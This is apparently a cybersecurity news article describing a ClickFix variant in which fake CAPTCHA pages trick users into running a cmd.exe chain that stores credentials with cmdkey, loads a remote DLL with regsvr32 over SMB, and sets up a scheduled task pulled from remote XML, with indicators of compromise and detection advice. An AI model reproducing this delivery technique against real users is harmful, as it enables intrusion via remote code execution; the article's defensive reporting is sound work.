Hackers News Hackers News
  • CyberSecurity News
  • Threats
  • Attacks
  • Vulnerabilities
  • Breaches
  • Comparisons

Social Media

Hackers News Hackers News
  • CyberSecurity News
  • Threats
  • Attacks
  • Vulnerabilities
  • Breaches
  • Comparisons
Search the Site
Popular Searches:
technology Amazon AI
Recent Posts
PamStealer Mimics Maccy, Silently Harvests Data
July 4, 2026
Critical FatFs Vulnerabilities Expose Millions of Embedded Devices
July 4, 2026
Critical Linux Kernel Vulnerability CVE-2023-0179 Grants Root Access
July 4, 2026
Home/Threats/ClickFix Attack Replaces PowerShell with Cmdkey and Remote Regsvr32
Threats

ClickFix Attack Replaces PowerShell with Cmdkey and Remote Regsvr32

Key Takeaways A new variant of the ClickFix attack chain has emerged, abandoning PowerShell in favor of native Windows tools. The attack leverages cmdkey and regsvr32 to silently deliver and execute...

Jennifer sherman
Jennifer sherman
April 27, 2026 5 Min Read
34 0

Key Takeaways

  • A new variant of the ClickFix attack chain has emerged, abandoning PowerShell in favor of native Windows tools.
  • The attack leverages cmdkey and regsvr32 to silently deliver and execute a remote payload without dropping files to disk.
  • Discovered by CyberProof, this technique employs social engineering with fake CAPTCHA pages to trick users into executing a multi-stage command.
  • The attack establishes persistence by creating a scheduled task that retrieves its definition from a remote XML file, making it stealthy and adaptable.
  • Organizations should enhance monitoring for suspicious activity involving these legitimate Windows utilities and reinforce user education against social engineering tactics.

ClickFix Evolves: PowerShell Replaced by Native Windows Tools for Stealthy Payload Delivery

A sophisticated evolution of the ClickFix attack, dubbed “ClickFix v2” by researchers, has been observed in the wild. This latest iteration marks a significant strategic shift, moving away from PowerShell to exploit a chain of legitimate Windows utilities for payload delivery and execution. The new technique allows attackers to silently infiltrate systems without leaving traditional forensic traces on disk, posing a substantial challenge to conventional detection mechanisms.

Table Of Content

  • Key Takeaways
  • ClickFix Evolves: PowerShell Replaced by Native Windows Tools for Stealthy Payload Delivery
  • Inside the Infection Mechanism
  • Indicators of Compromise (IOCs)
  • What You Should Do

ClickFix campaigns have historically relied on social engineering to coerce users into running malicious commands. Earlier versions typically involved victims pasting commands, often obtained from deceptive CAPTCHA pages, into the Windows Run dialog. These commands would then invoke PowerShell to download and execute a malicious payload. The efficacy of this method has made ClickFix a persistent concern for cybersecurity professionals.

The CyberProof Threat Research Team, comprising Deepak Nayak, Kithu Shajil, and Veena Sagar, identified this novel ClickFix variant. Their findings, published on April 22, 2026, highlight the complete abandonment of PowerShell in this updated attack. This change significantly hinders detection by security tools configured to flag PowerShell-based malicious activity.

CyberProof’s researchers noted that the updated campaign employs a concise command chain. This chain meticulously stores credentials, retrieves a remote Dynamic Link Library (DLL), and executes it stealthily using trusted Windows components. By “living off the land” and exclusively utilizing built-in Windows tools (LOLBins), attackers can seamlessly blend their malicious operations with normal system behavior, thereby making detection considerably more complex.

This strategic pivot has profound implications for organizations relying heavily on behavioral detection. Traditional security solutions designed to detect suspicious file drops or unusual process executions might fail to trigger alerts, as the attack leverages only legitimate system binaries. A single, socially engineered command executed through the Windows Run dialog is sufficient to initiate a multi-stage attack chain, establish persistence on the compromised machine, and connect back to attacker-controlled infrastructure. This low barrier to entry makes the threat accessible to a broad spectrum of potential victims, from individual users to corporate entities.

The campaign’s effectiveness is amplified by the minimal user interaction required for infection: a simple paste and execution of a pre-loaded command. The attackers meticulously craft the initial phishing pages, often impersonating legitimate Cloudflare CAPTCHA screens, to build trust and encourage victims to perform the malicious action.

Inside the Infection Mechanism

The attack sequence begins when a user navigates to a phishing page disguised as a CAPTCHA verification prompt. The page instructs the victim to open the Windows Run dialog (Win + R), paste a provided command, and press Enter. The observed command initiates cmd.exe and orchestrates two primary actions.

Attack Chain Summary (Source - CyberProof)
Attack Chain Summary (Source – CyberProof)

First, the cmdkey utility is used to store credentials for the remote IP address 151.245.195[.]142 under the username “guest.” Immediately following, regsvr32 is invoked to silently load a DLL, specifically “demo.dll,” from the attacker’s Server Message Block (SMB) share via a Universal Naming Convention (UNC) path. A “REM” comment embedded within the command, stating “I am not a robot,” further attempts to mask the malicious intent, portraying it as a genuine verification step.

Establishing Persistence and Executing the Second-Stage Payload (Source - CyberProof)
Establishing Persistence and Executing the Second-Stage Payload (Source – CyberProof)

Upon execution of the remote DLL by regsvr32, its DllRegisterServer export triggers a hidden CreateProcessA call. This call establishes a scheduled task named “RunNotepadNow” using the Windows Task Scheduler. Crucially, the task definition itself is not stored locally on the infected machine but is dynamically retrieved from a remote XML file hosted on the attacker’s server. This method allows the attackers to modify their second-stage payload at any time without needing to redeploy the initial DLL, providing long-term persistence with minimal on-host forensic artifacts.

Malicious Command Execution via Run Dialog (Source - CyberProof)
Malicious Command Execution via Run Dialog (Source – CyberProof)

To counter this advanced threat, security teams must implement enhanced monitoring strategies. This includes vigilance over cmdkey usage, particularly when associated with external IP addresses, and careful scrutiny of regsvr32 processes loading remote DLLs via UNC paths. Robust alerting should be configured for chained command execution originating from cmd.exe, and any Task Scheduler activity referencing remote XML files warrants immediate and thorough review. Network-level restrictions or stringent monitoring of outbound SMB and UNC access are also critical. Furthermore, continuous user education remains paramount to equip employees with the ability to recognize and avoid ClickFix-style social engineering attempts before they inadvertently execute malicious commands.

Indicators of Compromise (IOCs):

  • 151[.]245.195.142
  • \151[.]245.195.142hidemo.dll
  • \151[.]245.195.142hi777.xml
  • SHA256: b2d9a99de44a7cd8faf396d0482268369d14a315edaf18a36fa273ffd5500108

What You Should Do

  • Enhance Endpoint Detection and Response (EDR) Rules: Configure EDR systems to detect unusual execution patterns involving cmdkey and regsvr32, especially when they interact with remote IP addresses or UNC paths.
  • Monitor for Chained Command Execution: Implement alerts for instances where cmd.exe is used to chain multiple commands, particularly those involving credential storage or remote file loading.
  • Restrict Outbound SMB/UNC Traffic: Limit or strictly monitor outbound SMB and UNC access from endpoints to external IP addresses to prevent remote payload retrieval.
  • Review Scheduled Task Creation: Scrutinize any new scheduled tasks, particularly those that retrieve their definitions or executables from remote XML files or network shares.
  • Conduct Regular Security Awareness Training: Educate users about social engineering tactics, specifically those mimicking CAPTCHA pages, and emphasize the dangers of pasting or executing commands from untrusted sources.

Disclaimer: HackersRadar reports on cybersecurity threats and incidents for informational and awareness purposes only. We do not engage in hacking activities, data exfiltration, or the hosting or distribution of stolen or leaked information. All content is based on publicly available sources.

Tags:

AttackCybersecurityphishingSecurityThreat

Share Article

Jennifer sherman

Jennifer sherman

Jennifer is a cybersecurity news reporter covering data breaches, ransomware campaigns, and dark web markets. With a background in incident response, Jennifer provides unique insights into how organizations respond to cyber attacks and the evolving tactics of threat actors. Her reporting has covered major breaches affecting millions of users and has helped organizations understand emerging threats. Jennifer combines technical knowledge with investigative journalism to deliver in-depth coverage of cybersecurity incidents.

Previous Post

Microsoft Issues Group Policy to Disable Windows 11 Copilot on Enterprise Devices

Next Post

North Korean Hackers Target Pharma with Weaponized Excel Malware

No Comment! Be the first one.

Leave a Reply Cancel reply

Your email address will not be published. Required fields are marked *

Popular Posts
Alibaba Bans Internal Use of Claude AI Over Backdoor Concerns
July 3, 2026
Apache ActiveMQ Critical Vulnerabilities Allow DoS Attacks, System Crashes
July 3, 2026
Scammers Impersonate Brands in Gambling Ads to Drive Casino Traffic
July 3, 2026
Top Authors
Marcus Rodriguez
Marcus Rodriguez
Jennifer sherman
Jennifer sherman
Emy Elsamnoudy
Emy Elsamnoudy
Let's Connect
156k
2.25m
285k

Related Posts

Jennifer sherman
By Jennifer sherman
Threats

GlassWorm Attacks macOS via Malicious VS Code…

January 1, 2026
Emy Elsamnoudy
By Emy Elsamnoudy
Attacks

ClickFix Attack Hides Malicious Code via Stegan Security

January 1, 2026
Sarah simpson
By Sarah simpson
Vulnerabilities

MongoBleed Detector Tool Released to Detect MongoDB Vulnerability(CVE-2025-14847)

January 1, 2026
Emy Elsamnoudy
By Emy Elsamnoudy
Breaches

Conti Ransomware Gang Leaders & Infrastructure Exposed

January 1, 2026
Hackers News Hackers News
  • [email protected]

Quick Links

  • Contact Us
  • Privacy Policy
  • Terms of service

Categories

Attacks
Breaches
Comparisons
CyberSecurity News
Threats
Vulnerabilities

Let's keep in touch

receive fresh updates and breaking cyber news every day and week!

All Rights Reserved by HackersRadar ©2026

Follow Us